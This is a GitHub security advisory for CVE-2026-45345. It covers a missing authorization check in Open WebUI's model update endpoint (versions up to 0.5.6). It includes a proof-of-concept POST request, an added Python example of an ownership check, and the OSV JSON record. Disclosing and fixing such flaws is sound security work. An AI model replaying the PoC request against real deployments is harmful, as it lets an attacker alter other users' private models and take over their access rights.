GHSA-GM54-M39W-GRJP

Vulnerability from github – Published: 2026-05-14 20:21 – Updated: 2026-05-19 15:59
Summary
Open WebUI missing authorization check at the model update function - models from other users can be updated
Details

Summary

A user can modify another user's model even if its visibility is set to Private. The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.

Details / PoC

The user Victim created a private model with the visibility set to private: (screenshot omitted)

The user Attacker can edit this model using the following POST request:

POST /api/v1/models/model/update?id=aaabraaa HTTP/2
Host: domain.local
//Some headers removed
Te: trailers

{"id":"aaabraaa","base_model_id":"gpt-4o-POC","name":"testmodel","meta":{"profile_image_url":"/static/favicon.png","description":"","capabilities":{"vision":true,"usage":false,"citations":true},"suggestion_prompts":null,"tags":[],"toolIds":["test"]},"params":{},"user_id":"565c82e6-083f-42bb-bf0f-a4e214cfb9ad","access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}},"is_active":true,"updated_at":1737314575,"created_at":1737121281}

Request / Response (screenshot omitted)

Impact

A user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained.
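Added example, not Open WebUI's own code: the ownership/ACL check that an update handler for this endpoint needs, modelled on the access_control shape in the request body above. The in-memory store, the attacker id, and the function names are assumptions; the model id and owner user_id come from the advisory.

```python
# Added example, not Open WebUI's code: an ownership/ACL check for a
# model-update handler. Names, store layout and semantics are assumptions.
VICTIM = "565c82e6-083f-42bb-bf0f-a4e214cfb9ad"  # user_id from the advisory
ATTACKER = "attacker-user-id"                     # constructed placeholder

# Constructed store holding the private model from the advisory: empty
# read/write lists, so only the owner should be able to change it.
STORE = {"aaabraaa": {
    "id": "aaabraaa", "user_id": VICTIM, "name": "testmodel",
    "access_control": {"read": {"group_ids": [], "user_ids": []},
                       "write": {"group_ids": [], "user_ids": []}}}}

class Forbidden(Exception):
    """Raised when the requester may not modify the model."""

def can_write_model(model, requester_id, requester_groups):
    """Owner may always write; anyone else only via access_control.write.
    A missing access_control is treated as owner-only here (assumption)."""
    if model["user_id"] == requester_id:
        return True
    write = (model.get("access_control") or {}).get("write", {})
    if requester_id in write.get("user_ids", []):
        return True
    return bool(set(requester_groups) & set(write.get("group_ids", [])))

def update_model(store, model_id, form, requester_id, requester_groups=()):
    """Authorize before applying the form. Identity fields are never taken
    from the client, and only the owner may rewrite access_control, so a
    permitted collaborator cannot widen the ACL as the Impact describes."""
    model = store[model_id]
    if not can_write_model(model, requester_id, requester_groups):
        raise Forbidden(f"{requester_id} may not update model {model_id}")
    protected = {"id", "user_id", "created_at"}
    if model["user_id"] != requester_id:
        protected.add("access_control")
    store[model_id] = {**model, **{k: v for k, v in form.items() if k not in protected}}
    return store[model_id]

def demo():
    """Replays the advisory's scenario against the hardened handler."""
    results = {}
    widen = {"name": "hijacked", "access_control": {
        "read": {"group_ids": [], "user_ids": [ATTACKER]},
        "write": {"group_ids": [], "user_ids": [ATTACKER]}}}
    try:
        update_model(STORE, "aaabraaa", widen, ATTACKER)
        results["attacker"] = "allowed"
    except Forbidden:
        results["attacker"] = "forbidden"
    results["owner"] = update_model(STORE, "aaabraaa", {"name": "renamed"}, VICTIM)["name"]
    return results
```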


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.5.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45345"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:21:38Z",
    "nvd_published_at": "2026-05-15T22:16:54Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA user can modify another user\u0027s model even if its visibility is set to `Private`.\nThe finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.\n\n### Details / PoC\nThe user `Victim` created a private model with the visibility set to `private`: \n![grafik](https://github.com/user-attachments/assets/de057943-512b-46bf-8671-2904d55ec056)\n\nThe user `Attacker` can edit this model using the following POST request:\n```\nPOST /api/v1/models/model/update?id=aaabraaa HTTP/2\nHost: domain.local\n//Some headers removed\nTe: trailers\n\n{\"id\":\"aaabraaa\",\"base_model_id\":\"gpt-4o-POC\",\"name\":\"testmodel\",\"meta\":{\"profile_image_url\":\"/static/favicon.png\",\"description\":\"\",\"capabilities\":{\"vision\":true,\"usage\":false,\"citations\":true},\"suggestion_prompts\":null,\"tags\":[],\"toolIds\":[\"test\"]},\"params\":{},\"user_id\":\"565c82e6-083f-42bb-bf0f-a4e214cfb9ad\",\"access_control\":{\"read\":{\"group_ids\":[],\"user_ids\":[]},\"write\":{\"group_ids\":[],\"user_ids\":[]}},\"is_active\":true,\"updated_at\":1737314575,\"created_at\":1737121281}\n```\nRequest / Response\n![grafik](https://github.com/user-attachments/assets/19986403-b782-4288-b618-202b55519bb1)\n\n### Impact\nA user can modify another user\u0027s model even if its visibility is set to `Private`. By changing the access permissions during editing, unauthorized access can be gained.",
  "id": "GHSA-gm54-m39w-grjp",
  "modified": "2026-05-19T15:59:21Z",
  "published": "2026-05-14T20:21:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45345"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI missing authorization check at the model update function - models from other users can be updated"
}

